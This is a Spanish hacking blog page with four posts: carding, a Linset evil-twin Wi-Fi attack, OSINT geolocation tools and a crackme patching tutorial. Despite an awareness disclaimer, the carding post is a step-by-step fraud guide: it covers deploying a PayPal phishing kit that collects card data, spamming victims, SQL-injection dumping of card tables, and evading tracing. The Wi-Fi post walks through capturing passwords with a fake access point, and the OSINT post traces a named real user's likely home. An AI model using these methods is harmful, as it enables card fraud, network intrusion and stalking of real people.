HACKER ANGELWHITE GALC

viernes, 26 de diciembre de 2014

COMO HACKEAR TARJETAS BANCARIAS



Keterangan gambar atau photo


Creo que este es el POST mas delicado que e publicado hasta ahora en mi Blog y antes de que se den golpes de pechos y comienzen a tirar agua bendita en mi honor o comienzen a satanizarme, les AVISO que de ninguna manera el material expuesto aqui es para insitar el cibercrimen, al contrario, es para ayudarlos a comprender como funciona esta tecnica que utilizan usuarios maliciosos y poder estar preparados o tratar de estar a un paso delante de ellos :) !

Bueno ya que se tranquilizaron respiraron y tomaron una buena taza de su bebida favorita y comodaron bien su asiento, comenzamos.


Comenzemos explicando basicamente que es el carding.


Carding: Es el uso ilegitimo de las tarjetas de crédito, o de sus números, pertenecientes a otras personas. Se relaciona con el hacking, porque para conseguir números de tarjetas de créditos, una de las formas es utilizando Ingenieria Social y sobre todo nuestra inteligencia (esto es lo mas importante)


Se debe tener mucho cuidado en hacer esto ya que nos podemos meter en muchos líos.
Con nuestras tarjetas de crédito debemos ser cuidadosos ya que alguien puede leer este documento antes que uno de ustedes y ser capaz de estafarlos.

Se puede recuperar el dinero talvez pero para eso tendrían que hablar con el administrador del sitio donde se realizo el pago del artículo solicitando la IP de donde se hizo la compra y luego de todo esto tenemos que demostrar que nosotros no hicimos la compra del mismo.

El carding consiste en comprar usando la cuenta bancaria o la tarjeta crédito de otro, esto se consigue con un poco de ingenieria social y mucha perseverancia.

Cuando alguna persona utiliza carding para comprar objetos materiales se suele utilizar una dirección falsa con una identificación también falsa, es decir todo el formulario de compra lo llena con datos falsos.
De esta manera el comprador quedara esperando en el lugar indicado la entrega del material como si se tratara de su residencia.

La filosofía de los carders se basa en que existe mucha gente que tiene grandes cantidades de dinero que no cae nada mal utilizar algo de ese dinero para comprar algunas cositas para cada uno de ellos, ya que posiblemente el dueño de la tarjeta ni se de cuenta de esta compra que el no la hizo.

Si ustedes están pensando en comprar por Internet programas o suscripciones y piensan que utilizando el carding será muy fácil pues tienen toda la razón resulta muy sencillo.



Pero de donde obtienen los datos los atacantes? 


BOTNETS 



Una botnet es una red de ordenadores (de 5000++++) infectados por un programa que hace que el ordenador se conecte a un servidor que controla todas las maquinas infectadas. De aqui se pueden sacar Cuentas, Tarjetas, Datos personales etc. Las formas de hacerlo varian de la creatividad del carder. Pero lo mas usual es cambiar el host file de la victima redireccionando los principales sitios de pagos a un scam. *scam : Clon de algun recurso que graba los datos los datos introducidos en los formularios o los envia directamente a su dueno. De aqui se pueden sacar datos como informacion de tarjetas y cuentas bancarias.


SKIMMERS 



Los SKIMMERS son maquinas que se quedan con los datos de las bandas magneticas y las guardan a un archivo (DUMP). Para sacar dumps con este tipo de aparatillos es de buena costumbre aprovechar lugares de trabajo. Lo unico que hay que hacer es pasar la tarjeta por el lector. Lo mas 1337 serian los ATM skimmers... pero tienen sus inconvenientes a la hora de ponerlos)))


HACKING E-SHOPS. 


Aqui no hay nada que detallar ya que hay muchisimas tecnicas de hacerlo. Lo que hay que tener en cuenta al elegir un e-shop victima es que ha de aceptar tarjetas de credito sin redireccion a la pasarela de pagos del banco de la tarjeta ya
que estos no guardan datos de la tarjeta en su base... Tiene que ser un sitio con formulario estandar para introducir la tarjeta que bi se valida al instante.


FAKE SHOPS. 


No tiene que ser Fake shop... la idea es crear una tienda virtual donde se pueda pagar con tarjetas de credito. De ally hay dos salidas. La primera seria realmente hacer envios al comprador. Y la segunda es por alguna razon cancelar su pedido. Mas si antes de cancelar el pedido del todo se pieden datos adicionales como fotocopia del SSN del pasaporte o de la tarjeta mucho mejor!


COMPRAR MATERIAL 

Si lo todo lo mencionado antes le parece demasiado dificil, hay una salida facil... pero hay que pagarla... Pueden encontrar material de todo tipo en foros o canales especializados en carding (IRC). no voy a poner enlaces ya que no cuesta nada buscar en google. Si tiene conocimientos de ingles... MUCHO MAS FACIL). Recomendaria negociar en foros ya que en IRC hay mas probabilidades de ser rippead0)...


Termino recordando que la creatividad de la estafa es infinita. lo unico que hay que hacer pensar unpoco en lo que te has propuesto y de como consegirlo... y despues... hacerlo)

Bueno ya los meti en el Concepto lo que sigue es como se hace en la vida real !!

Vallas por unos Doritos despejense porque lo que sigue se pondra interesante.



SCAMS  + Mailers Spammer 

En este tema tocaremos sobre la plataforma que trabaja el carder y como nosotros podemos tener la nuestra de una manera  tan sensilla


Pasos  :


  1. Tener un scams actualizado de paypal
  2. Tener un Cpanel para subirlo al servidor
Una ves obtenido estos dos requisitos, vamos a subir nuestro scam mediatnte el "upload" del Cpanel en la opcion " cargar " debemos comprimir nuestro scam en extension " .zip " para que lo descomprima sin ningun problema luego de ello una vez subido nuestro scam :
Una vez subido como vemos en la  imagen nosotros editaremos el archivo " Email.php " y nos saldra este codigo :
<?
$send = "youemail@hotmail.com";  ///////////// CHANGE YOUR EMAIL OK.
?>
nosotros en la parte del correo electronico le pondremos  nuestro correo para que llege los datos  de las personas, pero no creen que seria algo un poco cursi ? tanto si nos rastrean los datos de envios u  otro, bueno perfecto este scam tambien tiene la opcion de guardar los datos en .TXT en la misma we de manera automatica sin modificar nada sigamos.
Ya tenemos nuestro Scam 100 % estable :
Una vez completado ahora lo que haremos sera spamear una lista de correos electronicos que esten con cuentas de paypal / se puede obtener dumpeando un sitio web  que tenga las tablas de paypal y los corrreos electronicos o utilizadno un extractor de correos a una web de "Shop" enlazada con paypal , pero para ello nesesitamos lo siguiente :
  1. Mailer.php para enviar el spam a los correos
  2. Letter en este caso de paypal para enviar el mensaje mediante html
 Les aconsejo que suban el Mailer.php en un servidor aparte , que no este en el mismo servidor del scam ya que el mailer  puede ser quemado facilmente.
Bueno una ves subido el mailer.php lo tendremos de la siguiente manera :
Aqui es donde entra en funcion el " Letter " , el  Letter no es mas que un archivo contenedor del codigo fuente del mensaje que paypal deja en los correos electronicos de los usuarios para  una seria de procesos en la cuenta del usuario :
Pegar el codigo del  lettler debemos modificar algunas cosas por ejemplo el link de la web
donde se direccionara el mensaje en este caso la web de nuestro "Scam "
<html>
    <body>
        <p>
            <a href="http://yourdomaine.com"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>
------------------------------------------------------------------------------------------------------------
Source Edit :
<html>
    <body>
        <p>
            <a href="http://ejemploscam.com/hi"><img alt="" src="http://s15.postimg.org/pfih678h7/222222.png" /></a></p>
    </body>
</html>
Una ves modificado correctamente llenaremos los datos del email.php , para spamear los correos electronicos :
Requito :
  1. Tener una lista de correos electronicos
  2. Copiar el source del lettler en Message Box
Ejemplo de datos que se debe poner :
Luego de ello le daremos en " Send eMails ", para que empieze a enviar el mensaje :
Enviado los mensajes  a la bandeja de entrada del correo, en este caso la victima creera que fue enviado por la misma web de Paypal :
La victima le dara clip en el enlace :
Luego de ello la victima caera en nuestra trampa y pondra los datos  de su tarjeta de credito  y su cuenta de paypal  en esta seccion de aqui  : 
Luego que la victima aya puesto todos sus datos y aceptado en las opciones de continuar, automaticamente  se guardara el  registro y se creara una carpeta en nuestro scam llamada  Rezult/CREDIT.txt mas el archivo donde se almacenaran los datos de la tarjeta de credito .
Link de descarga de todo lo utilizado en este proceso :

DUMPEO DE CCV 

El dumpeo de las datos de una tarjeta , no es mas que una inyeccion SQL mediante una herramienta como sqlmap o havij , ya que solo extraeremos los datos que almacene la DB .
Quizas el metodo de hallar es utilizando las "dorks" de google ya que la mayoria las usa para este tipo de ataque  de algunas dork especialmente de Carding ,en este proceso  de ataque es algo comun pero este nos dara $ $ $ .
Primero nesesitamos una web vulnerable en ese caso :
http://www.localhost.com/category.php?cat_id=1 
   
 Una ves extraido la base de datos " la mayoria de tarjetas de credito se encuentren en las Tablas "Orders" o " Shopping_cart " se encuentran los datos de las CCV
Database: db309014570
[15 tables]
+-----------------------+
| categories            |
| contents              |
| login                 |
| orders                |
| orders_temp           |
| ordersp               |
| ordersp_temp          |
| products              |
| resale                |
| resale_temp           |
| shopping_cart_info    |
| shoppingcart          |
| user_credit_cart_info |
| users                 |
| users_wishlist        |
+-----------------------+
Aver entraremos en la tabla " shopping_cart_info " y veamos que nos arroja :
Como vemos no ah dado informacion sobre los datos de las CCV , pero si se fijan hay mas tablas donde puede aver mas informacion para sacarle mas jugo a todo ese dinero $ $ $
entraremos a la tabla " users ", ya que estos usuarios registran su datos  para poder comprar productos de la web la cual nos hace tener acceso a este sitio 100 % cardeable tanto de extraccion como para realizar nuestras compras aqui mismo.
Esta web es cardeable internamente, bueno sin mas que decir me despito ante ustedes se me olvida decirles algo , al momento de dumpear y comprar productos les aconsejo uilizar siempre un proxy Socks5 Premium , quizas uno podra decir vaya protego mi IP y listo, pero no mis queridos amigos(a) , la mac juega un rol importante en el soporto de un ordenador de la misma empresa, ya que es su numero  de " SERIE" y pocos le toman importancia  a ello les dejare una herramienta "Premium" para cambiar nuestra Mac de manera manual :
Link de descarga : 
Bueno esto es todo , pero les sirva de algo en su vida diaria en la proteccion de sus intereses.

Autor  Omar Rodriguez 

Hackeando WPA/WPA2 sin WPS ni Diccionarios


Por fin! lo que mucha gente estaba esperando !! Linset es una herramienta basada en Evil Twin Attack, que nos permite conseguir claves WPA y WPA2 sin WPS de una manera muy rápida y fácil.

El tipo de Evil Twin, consiste en simular un router igual al que queremos atacar, des-autenticamos a todos los clientes del router real (bueno) y de esta manera los usuarios con la clave del real se conectaran al maligno e introducirán la clave en un formulario y la tendremos, así de sencillo y rápido.


Introducción


Descarga:
Linset lo descargaremos de aquí, que es el repositorio de vk496, (autor de la herramienta).

En la distribución Wifislax 4.8 ya viene incluida, en Wifislax > Wpa > Linset (Evil twin attack).

Bueno, antes de nada y comiencen  a tratar de correrla o ejecutarla en su sistema.

Para los que no la saben, Linset es una herramienta de ingeniería social, basada en el MITM para comprobar la seguridad (o ignorancia) de los clientes de nuestra red.

Los pasos que realiza son:


  • Escanea la red.
  • Selecciona la red.
  • Busca handshake (se puede usar sin handshake)
  • Se elige una de las varias interfaces web adaptadas.
  • Se monta un FakeAP imitando al original
  • Se crea un servidor DHCP sobre el FakeAP
  • Se crea un servidor DNS para redirigir todas las peticiones al Host
  • Se lanza el servidor web con la interfaz seleccionada
  • Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir
  • Se des-autentifica a todos los usuarios de la red, esperando que se conecten al FakeAP e introduzcan la contraseña.
  • Se detiene el ataque tras la comprobación correcta de la contraseña
Para probar su funcionamiento, es necesario que tengan instaladas diversas dependencias, las cuales LINSET comprobará y indicará si están instaladas o no.

Mejoras


En la ultima versión e visto muchas mejoras las cuales describo a continuación:
  • Solucionar bucle infinito de la web cuando se entra a través de una subURL muy rara. [Solucionado]
  • Implementar re-direccionamiento en lighttpd que no provoque ese bucle
  • La carga de la web por primera vez se hace muy lenta aveces (probado solo desde móvil) [Solucionado]
  • Mejorar el sistema encargado de gestionar la comprobación del handshake [Solucionado]
  • Titulo al script...  [Solucionado]
  • Interfaz mas bonita al script....  Grin [Solucionado]
  • Colores y diálogos...  Grin [Solucionado]
  • Interfaz neutral basado en popup de jquerry [Solucionado]
  • Comprobación de Handshake en segundo plano

Ejecución

Lo mas normal es que el archivo lo hayamos guardado en descargas y posteriormente lo ejecutamos. Abrimos una consola de comandos y escribimos lo de Azul:
Nos movemos a descargas: cd Descargas
Damos permisos a todos los usuarios de ejecución: chmod a+x linset
Lo ejecutamos: linset
Inicio de Linset y seleccion de la tarjeta.
Seleccionamos la interfaz: 1 (En mi caso corresponde a mi tarjeta Alpha.
Seleccionamos el canal: 1 (Escanear todo)
Nos empezara a capturar redes, cuando tengamos las deseadas, pulsamos Control + C , para que pare de capturar.
Redes capturadas, seleccionamos una que tenga clientes.
Método de verificación de pass: 1 Handshake(Recomendado)
Tipo de comprobación del handshake: 1 Estricto
Capturar handshake del cliente: 1 Realizar desaut. masiva al AP objetivo
Desautentificación y captura del handshake
Selecciona la interface web: 1 Interfaz web neutra.
Selecciona idioma: 2 Spanish
Elección de idioma e info del objetivo

Y empezara el ataque, levanta el evil twin (Punto wifi malvado con idéntico nombre pero con autentificación open y luego echa a todos los clientes de la red verdadera para forzarlos a conectarse a la malvada y se queda así esperando una contraseña.
Desde un móvil/pc/tablet victima que estuviera conectado a la red y elija la malevola conseguirá acceder sin ningún problema a la red, pero al intentar cargar una pagina le saldrá un mensaje, y justo en el momento que presione enviar es enviada al atacante y automáticamente comprueba si es verdad la contraseña, en el caso de que no sea, saldrá que no es correcta.
Pero.... si esta esta correcta al atacante le aparecerá el mensaje como que la ha conseguido y la correspondiente password.
Un ataque muy sencillo interactuando con clientes de una red, que debemos cuidar como usuarios saber bien donde introducimos la contraseña y quien puede haber detrás de esa pantalla de login.

Algunas dudas que probablemente surgirán con este post:

  • Donde está el módulo XZM?
Desde la versión 4.8 de Wifislax, Linset ya viene incluido en la distribución. Por tanto, solo es necesario ir al menú y usar la herramienta.
  • Puedo usar Linset en otras distribuciones?
Si. Linset está pensado para adaptarse a distintas distribuciones. El único inconveniente es que tendrás que instalar todas las herramientas que utiliza, pero en principio no hay ningún problema
  • Por que la pagina web de linset me sale en sin color y da fallos? 
Este fallo es debido a la mala configuración de lighttpd cuando se lanza el ataque y que todavía no he encontrado solución. Cuando abres una URL compleja, surge un problema en las redirecciones a las ubicaciones de los archivos que están definidos en el HTML, con lo que no llega a encontrar. Por eso se aprecia en blanco y negro, porque no “encuentra” donde están las librerías de jQuerry Mobile. En casos extremos, tampoco vé al php que maneja los formularios y causa problemas en el envío y la recepción de la contraseña.
  • Cuando abro una web desde el movil no me redirige a la pagina de linset.
Eso es debido a que están activados los datos del movil. Si no se desactivan los datos, las páginas se obtendrán de internet, y no de Linset
  • Que dispositivos móviles son compatibles?
Todos los dispositivos son compatibles, aunque los últimos iOS de los iPhone dan algunos problemas (según los usuarios)
  • Puedo cambiar la pagina web por otra mas creible?
Linset no dará soporte a la importación de otras páginas webs que contengan copyright. Eso no quiere decir que no se puede hacer, pero se mantendrá la que hay actualmente.
  • Cuando se crea el AP falso, la MAC no es exactamente igual... por qué? 
Si se clona la MAC por completo, los dispositivos que intenten conectarse no sabrán distinguir las distintas wifis, por lo que es inviable hacer esto. 
  • Tengo un adaptador USB y me da problemas... por qué?
Hasta el momento, el único chipset que dá problemas es el 8187, pues no son compatibles con Hostapd. En vez de eso, se usará Airbase-ng, que tiene peor rendimiento (en velocidad de datos), pero sirve.
  • Puedo usar mi propio handshake en vez de capturar uno?
Si puedes, pero por ahora linset no incluye esa funcionalidad. Puedes hacerlo manualmente cuando Linset está en el menú de captura de handshake sustituyendo el handshake que se genera en /tmp/TMPLinset por el tuyo (ojo, tienen que tener el mismo nombre), y continuando con el proceso.

OSINT en redes sociales



¡Es un placer escribir para un blog de seguridad informática!, antes que nada agradezco a Angel White  por la invitación para En señar este tipo de ataque. Soy Emmanuel B. Precisamente esta semana di un webcast de OSINT para la comunidad de AprendiendoHackingXalapa, en la que explique tres herramientas de OSINT: fbstalker, geostalker y cree.py, las tres escritas en Python.

Pero se preguntarán, ¿qué diablos es OSINT?, OSINT por sus siglas Open Source Intelligence, son técnicas para recabar información de fuentes abiertas que ha sido empleada por los militares y las agencias de inteligencia a nivel mundial durante décadas, y ¿qué son las fuentes abiertas?, son fuentes de información de acceso público, cualquiera puede tener acceso a esta información, llámese Facebook, Twitter, Youtube, la página de la empresa donde trabajas, metadatos de tus archivos informáticos, periódicos, foros, el vecino, tu basura, los recibos del cajero automático que siempre tiras, tus recibos de luz e Internet y en si cualquier información al alcance de una novia celosa o de un depravado sexual.

Por lo que ven OSINT es un tema bastante amplio, nosotros en este artículo lo enfocaremos a las redes sociales de Twitter e Instagram, omito Facebook por que el fbstalker ha tenido un desfase frente a las nuevas actualizaciones de Facebook.

Más de un curioso se preguntará, ¿para qué sirve esto del OSINT?, debo decir que sirve para muchísimas cosas, desde su origen que es para recabar información de enemigos de guerra o de hacktivistas, pasando por el análisis de información de empresas respecto a sus potenciales clientes, su mercado actual y su imagen corporativa, hasta espionaje empresarial, suplantación de identidad, saber dónde estuvo tu novia la noche anterior, conseguir el número y dirección de la chica rikitik de tu universidad que tanto te gusta, y en sí obtener tanta información de algo o alguien como sea posible. En el mundo del verdadero hacking (no en el de los script kiddies o wannabes cuyo objetivo en la vida es “hackear” una cuenta de Facebook) las técnicas de OSINT son el primer punto obligado a partir, gracias a estas técnicas es que se construye un buen vector de ataque, y como es sabido en el arte de la guerra:

“Conoce a tu enemigo y conócete a ti mismo; en cien batallas, nunca saldrás derrotado. Si eres ignorante de tu enemigo pero te conoces a ti mismo, tus oportunidades de ganar o perder son las mismas. Si eres ignorante de tu enemigo y de ti mismo, puedes estar seguro de ser derrotado en cada batalla.” 
 --Sun Tzu, El arte de la guerra. 

Un buen vector de ataque incrementa nuestras probabilidades de éxito en alguna auditoria o pentest a algún sistema de cualquier tipo. Explicado lo anterior comenzaremos con el uso conjunto de dos herramientas de OSINT para redes sociales: geostalker y cree.py


Geostalker. 

El objetivo de este artículo no es la instalación de las herramientas, si bien se trata de instalar y configurar varias cosas (sobre todo de Python y de los tokens de developer de las fuentes de información), si se vuelve a veces algo confuso, si les gustaría que hablara sobre la instalación de las herramientas podrían comentar aquí abajo.

Geostalker puede ser descargado desde esta url https://github.com/milo2012/osintstalker, esta herramienta dadas coordenadas de latitud y longitud recaba información de las fuentes abiertas Wigle.net, Instagram, Twitter, Foursquare y Flickr; al procesar los datos nos da información de acuerdo a las coordenadas que pusimos de los Access Point Wireless a la redonda, fotos tomadas en el lugar, cuentas de redes sociales y post de personas que han visitado el lugar.

Los comandos para ejecutarlo son ya sea en consola de Linux o en cmd de Windows: 

geostalker.py –location coordenada_1,coordenada_2
ej: geostalker.py –location 16.755138, -93.129243

Dado el comando, la herramienta nos comenzará a dar los resultados de la información recabada en esas coordenadas, en mi ejemplo puse las coordenadas del centro de Tuxtla Gutierrez, Chiapas en México.
Al finalizar la herramienta nos entrega dos archivos, uno html el cual es un mapa y un reporte en txt, que nos da información de las cuentas encontradas.



En lo personal me llamó la atención el post que dice: "Al final el asesino regresa a la escena dle crimen", vamos a visitar  el twitter de la persona que escribió eso.

Esta persona acaba de escribir el tweet cerca de las coordenadas con las que ejecutamos el geostalker y por lo visto tiene activada la opción de geolocalización en sus tweets. Geostalker llega hasta aquí, pero si quisiéramos rastrear a esta persona mediante sus tweets (ya que vimos que los tienen la ubicación donde fueron hechos) pasamos a la siguiente herramienta.
Cree.py.
Esta herramienta puede ser descargada en https://ilektrojohn.github.io/creepy/, su función principal es encontrar las ubicaciones dentro de un mapa de una cuenta de twiiter, instagram o flickr, analizando los metadatos de los post e imagenes. 
Primero se debe de crear un nuevo proyecto, nosotros vamos a ver que encontramos del usuario de twitter melissamoises (previamente encontrado con geostalker).

Posteriormente buscamos el nombre de usuario en cuestión y lo seleccionamos como target.
Y luego analizamos los resultados.




Por ultimo aplicamos un mapa de calor para ver los lugares donde mas frecuenta twittear esta persona.


Ya uno puede darse una idea de por donde puede vivir esta persona.

Como conclusión mediante técnicas de OSINT en redes sociales uno puede obtener información muy sensible de la persona,  por eso es importante desactivar la geolocalización de nuestros post en las diversas redes sociales, así como protegerlos para que solo nuestros contactos puedan acceder a ellos.

También que utilizando geostalker en las coordenadas de una empresa o corporación objetivo, los empleados constituirán un vector de ataque importante, es por tal motivo que hay que capacitar a los empleados para que tomen medidas de seguridad referente a sus publicaciones, basta con fotografías dentro de las instalaciones de alguna empresa o corporación para saber que software o que tipo de modem, routers, access point, utilizan y a partir de eso perfilar un ataque informático.

Espero les haya gustado este artículo, les recuerdo que estas técnicas son abordadas a detalle en el diplomado de SIOHE del cual soy docente.

Saludos y buenas noches colegas.

Ingeniería Inversa BASICA


Al paracer la inspiracion me llega en los ultimos dias de la semana jeje, en esta ocacion el dia de ayer jueves en la clase de programacion el profesor nos dio una introduccion a los metodos de seguridad, como sabran se hablo de lo viejo y basico; MD5, SHA1, metodos de encryptacion, de hasheo, y ofuscacion.
Continuamos la clase realizando una practica en la que empleábamos el uso de hash en diferentes motores de bases de datos, mientras asíamos eso recordé el hermoso mundo de la ingeniería inversa y lo grande que es ese tema y lo indispensable que es conocerla desde el lado "black hat".

Así que decidí compartir este pequeño pero muy buen post en el que se da muestra y practica de un pequeño digamos "tutorial" en el que se da paso a paso como realizar un básico Crackeo a una aplicación que desea validar un serial.


Lo que vamos a crackear en este post es una crackme, el cual para todo aquel que desee practicar pueda hacerlo siguiendo los mismos pasos, aquí  pueden bajar el crackme:

https://skydrive.live.com/#cid=1A68731A91386F4B&id=1A68731A91386F4B!114

Bien,  para hacer este tipo de crackeo hay varios tipos de programas, como por ejemplo:  OLLYDBG, W32DSM, INMMUNITY DEBUGGER, yo particularmente voy a hacerlo con el último, ya que es el que más me gusta, pero deben de saber que en el caso de OLLYDBG, el proceso es el mismo, bien, una vez ya tenemos nuestro programa para debuggear (desensamblar) y nuestro crackme (programa para crackear) comenzamos con  la operación.

-Lo 1º que haremos será abrir el programa que vamos a crackear  y una vez nos pide el serial para activarlo ponemos lo que queramos, en este caso yo he puesto 123456 y le damos a entrar:



- Una vez introducido el serial o la clave errónea, nos advertirá con una ventanita en la cual nos dará el mensaje de error diciéndonos que ese no es el serial, lo que hacemos será copiar el mensaje que muestra esa ventana:



Como podemos observar, el mensaje que este nos da es: key is wrong, bien una vez tenemos ya el mensaje copiado procederemos a abrir nuestro debugger  y una vez abierto vamos a la pestaña file o archivo y seleccionamos abrir u open y seleccionamos el programa que vamos a  crackear, que en este caso es el crackme:





Ahora nuestro debugger automáticamente nos abrirá  y desensamblara nuestro crackme o programa, bien una vez hecho esto, haremos click derecho y se nos abrirá una ventana, ahí haremos click sobre search for y posteriormente sobre all referenced text strings,  con esto último se nos abrirán todas las referencias de las cadenas de texto que contiene nuestro programa o crackme:



Bien, una vez hecho esto, lo que hacemos es buscar en el debugger el mensaje de error que anteriormente nos dio el  crackme, que era key is wrong y una vez localizado hacemos un doble click sobre el:



Bien, una vez  hecho el doble click sobre el,  lo que hacemos será buscar el mensaje que nos de paso, el ok al programa y una vez localizado, que en este caso es key is ok lo que haremos será copiar el nº que figura a la izquierda del todo:



Una vez localizado el número lo que haremos será buscar el mesaje anterior de error y haremos un  doble click sobre la zona donde pone push seguido de crackme1 y un numero y automáticamente se nos abrirá una ventana en la que deberemos introducir lo siguiente:

JMP SHORT 0041660
Y pulsamos sobre la pestaña assemble, de este modo lo que estamos haciendo es crear un salto, desde el  mensaje de error(key  is worng) hasta el mensaje del ok (key is ok) para que lo entendamos, con la orden JMP SHORT lo que le estamos diciendo al programa es que cuando llegue al mensaje de error, salte directamente al ok, de esta forma creamos el salto:



Como podemos observar ya se ha creado el salto, así que cada vez que ejecutemos nuestro programa, se saltará la restricción:



Hasta aquí todo bien, pero ahora para que este efecto quede permanente hay que proceder a guardarlo y para poder guardar los cambios haremos click derecho y se nos abrirá una ventana, en ella seleccionamos donde pone copy to executable y posteriormente en donde pone selection:



Una vez hecho esto veremos como se nos cambia y se nos desorganiza todas las ventanas dentro del debugger,pues bien, esto es normal no se asusten jajaja,  ahora lo que haremos será situarnos encima la primera ventana y haremos un click derecho  y seleccionaremos save file  y después solo nos queda decirle donde queremos que nos guarde el programa (aconsejado guardarlo en el mismo lugar donde estaba para que funcione :) :





Pues ahora solo queda probarlo, así que lo que haremos será abrir nuestro crackme o programa ya crackeado y una vez nos pida el serial o la clave, ponemos lo que nos dé la gana, que en mi caso es 123456 y le damos a entrar, podemos ver en la imagen que el crackem en este caso ya está crackeado:

Bien chic@s, pues esta es la base para crackear un programa, evidentemente, los hay mucho más complicados y avanzados pero todo a su tiempo, espero que le ayudara esta info en su crecimiento de conocimientos :)